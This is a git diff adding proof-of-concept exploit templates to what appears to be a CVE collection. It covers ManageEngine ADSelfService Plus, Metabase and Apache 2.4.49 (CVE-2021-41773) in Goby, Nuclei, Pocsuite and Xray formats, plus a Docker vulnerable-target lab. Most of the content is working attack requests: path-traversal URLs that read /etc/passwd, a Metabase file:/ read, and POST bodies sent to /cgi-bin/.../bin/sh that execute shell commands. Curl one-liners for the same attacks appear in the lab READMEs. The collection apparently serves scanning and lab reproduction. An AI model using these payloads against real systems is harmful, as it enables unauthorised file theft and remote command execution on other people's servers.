--- /dev/null
+++ b/2021/CVE-2021-40539/poc/goby/CVE-2021-40539.json
@@ -0,0 +1,72 @@
+{
+ "Name": "ADSelfService Plus RCE CVE-2021-40539",
+ "Level": "3",
+ "Tags": [
+ "rce",
+ "unauth"
+ ],
+ "GobyQuery": "(title=\"ManageEngine - ADSelfService Plus\" | app=\"ZOHO-ManageEngine-ADSelfService\" | title==\"ADSelfService Plus\" | body=\"ADSelfService Plus\")",
+ "Description": "Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致远程代码执行",
+ "Product": "ADSelfService Plus",
+ "Homepage": "https://www.manageengine.cn/products/self-service-password/pricing-details.html",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://forum.butian.net/share/876"
+ ],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/./RestAPI/LogonCustomization",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "methodToCall=previewMobLogo",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "var d = new Date();",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "window.parent.$(\"#tabLogo\")",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-30 20:01:22",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-41277/poc/goby/CVE-2021-41277.json b/2021/CVE-2021-41277/poc/goby/CVE-2021-41277.json
new file mode 100644
index 000000000..6ee016bf5
--- /dev/null
+++ b/2021/CVE-2021-41277/poc/goby/CVE-2021-41277.json
@@ -0,0 +1,98 @@
+{
+ "Name": "Metabase Geojson Arbitrary File Read CVE-2021-41277",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "(app=\"Metabase\" | title=\"Metabase\" | body=\"Metabase\")",
+ "Description": "Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.",
+ "Product": "Metabase",
+ "Homepage": "https://www.metabase.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486238&idx=1&sn=0eea83880942b16975335739e1db5aa2"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Path",
+ "Type": "input",
+ "Value": "/etc/passwd"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/geojson?url=file:/etc/passwd",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "/root:/bin/ash",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/geojson?url=file:{{{Path}}}",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-21 15:03:56",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/goby/CVE-2021-41773.json b/2021/CVE-2021-41773/poc/goby/CVE-2021-41773.json
new file mode 100644
index 000000000..04747eefb
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/goby/CVE-2021-41773.json
@@ -0,0 +1,105 @@
+{
+ "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)",
+ "Level": "2",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "(server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\"Apache\")",
+ "Description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.",
+ "Product": "Apache HTTP Server",
+ "Homepage": "http://httpd.apache.org/",
+ "Author": "aetkrad",
+ "Impact": "read arbitrary files
",
+ "Recommendation": "",
+ "References": [
+ "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Filepath",
+ "Type": "input",
+ "Value": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root:x:0:0:root:",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root:x:0:0:root:",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-10-28 10:10:27",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/nuclei/CVE-2021-41773.yaml b/2021/CVE-2021-41773/poc/nuclei/CVE-2021-41773.yaml
new file mode 100644
index 000000000..4b8ac8ef2
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/nuclei/CVE-2021-41773.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-41773
+
+info:
+ name: Apache 2.4.49 - Path Traversal and Remote Code Execution
+ author: daffainfo
+ severity: high
+ description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+ reference:
+ - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
+ - https://twitter.com/ptswarm/status/1445376079548624899
+ - https://twitter.com/h4x0r_dz/status/1445401960371429381
+ - https://github.com/blasty/CVE-2021-41773
+ tags: cve,cve2021,lfi,rce,apache,misconfig
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-41773
+ cwe-id: CWE-22
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
+
+requests:
+ - raw:
+ - |
+ GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
+
+ matchers-condition: or
+ matchers:
+
+ - type: regex
+ name: LFI
+ regex:
+ - "root:.*:0:0"
+
+ - type: word
+ name: RCE
+ words:
+ - "CVE-2021-41773-POC"
diff --git a/2021/CVE-2021-41773/poc/oneliner/wait_to_be_added b/2021/CVE-2021-41773/poc/oneliner/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/oneliner/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-41773/poc/others/README.md b/2021/CVE-2021-41773/poc/others/README.md
new file mode 100644
index 000000000..90e742d7b
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/others/README.md
@@ -0,0 +1,2 @@
+[https://github.com/numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773)
+[https://www.exploit-db.com/exploits/50383](https://www.exploit-db.com/exploits/50383)
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/pocsuite2/CVE-2021-41773.py b/2021/CVE-2021-41773/poc/pocsuite2/CVE-2021-41773.py
new file mode 100644
index 000000000..4f0508eb5
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/pocsuite2/CVE-2021-41773.py
@@ -0,0 +1,63 @@
+# coding: utf-8
+from pocsuite.lib.core.poc import Output
+from pocsuite.poc import POCBase
+from pocsuite.utils import register
+import urllib2
+import re
+
+class TestPOC(POCBase):
+
+ vulID = '''pcmgr-328131'''
+ version = '1'
+ vulDate = 'Wed Sep 29 2021 00:00:00 GMT+0800 (China Standard Time)'
+ author = 'pcmgr'
+ createDate = ''
+ updateDate = 'Fri Nov 26 2021 14:44:39 GMT+0800 (China Standard Time)'
+ references = '''[]'''
+ name = '''Apache Httpd 2.4.49任意文件读取&远程命令执行漏洞'''
+ cve = 'CVE-2021-41773'
+ appPowerLink = ''
+ appName = 'Apache-Web-Server'
+ appVersion = '2.4.49'
+ vulType = '任意文件读取'
+ vulGrade = '高危'
+ vulRepair = '''升级到最新版本'''
+ desc = '''Apache Httpd 2.4.49存在任意文件读取漏洞,在 配置为 Require all granted 时,会造成此漏洞'''
+ samples = ''''''
+
+ def _verify(self):
+ result = {}
+ if self.url[-1] == '/':
+ self.url = self.url[:-1]
+ payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+
+ target = self.url+payload
+
+ try:
+ resp = urllib2.urlopen(target)
+ data = resp.read()
+ if "root:" in data:
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = resp.url
+ except Exception as err:
+ print(err)
+ pass
+ return self.parse_output(result)
+
+ def parse_output(self, result):
+ # parse output
+ output = Output(self)
+ if result:
+ output.success(result)
+ return output
+
+ def _attack(self):
+ return self._verify()
+
+
+
+
+
+
+
+register(TestPOC)
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/pocsuite3/CVE-2021-41773.py b/2021/CVE-2021-41773/poc/pocsuite3/CVE-2021-41773.py
new file mode 100644
index 000000000..605018d75
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/pocsuite3/CVE-2021-41773.py
@@ -0,0 +1,94 @@
+from collections import OrderedDict
+import urllib.parse
+import re
+from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE
+from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
+from requests.api import patch
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+# 禁用安全请求警告
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+class POC(POCBase):
+ vulID = '0' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
+ version = '1' #默认为1
+ author = ['luckying'] # PoC作者的大名
+ vulDate = '2021-10-07' #漏洞公开的时间,不知道就写今天
+ createDate = '2021-10-07' # 编写 PoC 的日期
+ updateDate = '2021-10-07' # PoC 更新的时间,默认和编写时间一样
+ references = [''] # 漏洞地址来源,0day不用写
+ name = 'Apache 2.4.49' # PoC 名称
+ appPowerLink = '' # 漏洞厂商主页地址
+ appName = 'Apache HTTP服务目录遍历 (CVE-2021-41773)' # 漏洞应用名称
+ appVersion = '''Apache 2.4.49''' # 漏洞影响版本
+ vulType = VUL_TYPE.ARBITRARY_FILE_DOWNLOAD #漏洞类型,类型参考见 漏洞类型规范表
+ desc = '''
+ Apache HTTP服务目录遍历 (CVE-2021-41773)
+ '''
+
+ # 漏洞简要描述
+ samples = [''] # 测试样列,就是用 PoC 测试成功的网站
+ install_requires = [''] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
+ pocDesc = '''
+ 检测:pocsuite -r .\poc++.py -u url(-f url.txt) --verify
+ 利用:pocsuite -r .\poc++.py -u url(-f url.txt) --attack --path '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ '''
+ category = POC_CATEGORY.EXPLOITS.REMOTE
+
+ def _options(self):
+ o = OrderedDict()
+ o["path"] = OptString(default='/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',description='输入文件路径',require=False)
+ return o
+ def _verify(self):
+ result = {}
+ path = '/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ url = self.url + path
+ try:
+ r=requests.Request('GET', url).prepare()
+ r.url=url
+ resq=requests.session().send(r,timeout=5,verify=False)
+ if resq and resq.status_code == 200 and "root:x" in resq.text:
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = url
+ result['VerifyInfo']['POC'] = path
+ except Exception as e:
+ return
+ return self.parse_output(result)
+
+ def _attack(self):
+ result = {}
+ file = self.get_option("path")
+ url = self.url + file
+ try:
+ r=requests.Request('GET', url).prepare()
+ r.url=url
+ resq=requests.session().send(r,timeout=5,verify=False)
+ t = resq.text
+ print('output >>> \n' + t)
+ t = t.replace(" ", "")
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = url
+ result['VerifyInfo']['Name'] = t
+ except Exception as e:
+ return
+
+ def parse_attack(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('target is not vulnerable')
+ return output
+
+ def _shell(self):
+ return
+
+ def parse_output(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('target is not vulnerable')
+ return output
+
+register_poc(POC)
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-path-traversal.yml b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-path-traversal.yml
new file mode 100644
index 000000000..ce1b62bca
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-path-traversal.yml
@@ -0,0 +1,21 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
+manual: true
+transport: http
+rules:
+ cgibin0:
+ request:
+ cache: true
+ method: GET
+ path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+ expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+ icons0:
+ request:
+ cache: true
+ method: GET
+ path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+ expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+expression: cgibin0() || icons0()
+detail:
+ author: JingLing(https://github.com/shmilylty)
+ links:
+ - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-rce.yml b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-rce.yml
new file mode 100644
index 000000000..b92d5db44
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-rce.yml
@@ -0,0 +1,19 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-rce
+manual: true
+transport: http
+set:
+ r1: randomInt(800000000, 1000000000)
+ r2: randomInt(800000000, 1000000000)
+rules:
+ r0:
+ request:
+ cache: true
+ method: POST
+ path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
+ body: echo;expr {{r1}} + {{r2}}
+ expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+expression: r0()
+detail:
+ author: B1anda0(https://github.com/B1anda0)
+ links:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/vultarget/1.png b/2021/CVE-2021-41773/vultarget/1.png
new file mode 100644
index 000000000..6499d1f79
Binary files /dev/null and b/2021/CVE-2021-41773/vultarget/1.png differ
diff --git a/2021/CVE-2021-41773/vultarget/2.png b/2021/CVE-2021-41773/vultarget/2.png
new file mode 100644
index 000000000..19248b99c
Binary files /dev/null and b/2021/CVE-2021-41773/vultarget/2.png differ
diff --git a/2021/CVE-2021-41773/vultarget/Dockerfile b/2021/CVE-2021-41773/vultarget/Dockerfile
new file mode 100644
index 000000000..d720a88df
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/Dockerfile
@@ -0,0 +1,14 @@
+FROM vulhub/httpd:2.4.49
+
+LABEL maintainer="phithon "
+
+RUN set -ex \
+ && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
+ && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
+ && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
+ && cat /usr/local/apache2/conf/httpd.conf \
+ | tr '\n' '\r' \
+ | perl -pe 's|.*?|\n AllowOverride none\n Require all granted\n|isg' \
+ | tr '\r' '\n' \
+ | tee /tmp/httpd.conf \
+ && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf
diff --git a/2021/CVE-2021-41773/vultarget/README.md b/2021/CVE-2021-41773/vultarget/README.md
new file mode 100644
index 000000000..de12183be
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/README.md
@@ -0,0 +1,47 @@
+# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
+
+If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker-compose build
+docker-compose up -d
+```
+
+After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
+
+## Exploit
+
+A simple CURL command to reproduce the vulnerability (Note that `/icons/` must be a existing directory):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+The `/etc/passwd` is disclosured successfully:
+
+
+
+With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+
diff --git a/2021/CVE-2021-41773/vultarget/README.zh-cn.md b/2021/CVE-2021-41773/vultarget/README.zh-cn.md
new file mode 100644
index 000000000..39cd8b107
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/README.zh-cn.md
@@ -0,0 +1,46 @@
+# Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)
+
+Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:
+
+- 版本等于2.4.49
+- 穿越的目录允许被访问,比如配置了`Require all granted`。(默认情况下是不允许的)
+
+攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
+
+参考链接:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## 漏洞环境
+
+执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器:
+
+```
+docker-compose build
+docker-compose up -d
+```
+
+环境启动后,访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。
+
+## 漏洞利用
+
+使用如下CURL命令来发送Payload(注意其中的`/icons/`必须是一个存在且可访问的目录):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+可见,成功读取到`/etc/passwd`:
+
+
+
+在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+
diff --git a/2021/CVE-2021-41773/vultarget/docker-compose.yml b/2021/CVE-2021-41773/vultarget/docker-compose.yml
new file mode 100644
index 000000000..376995733
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ apache:
+ build: .
+ ports:
+ - "8080:80"
diff --git a/2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yaml b/2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yml
similarity index 100%
rename from 2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yaml
rename to 2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yml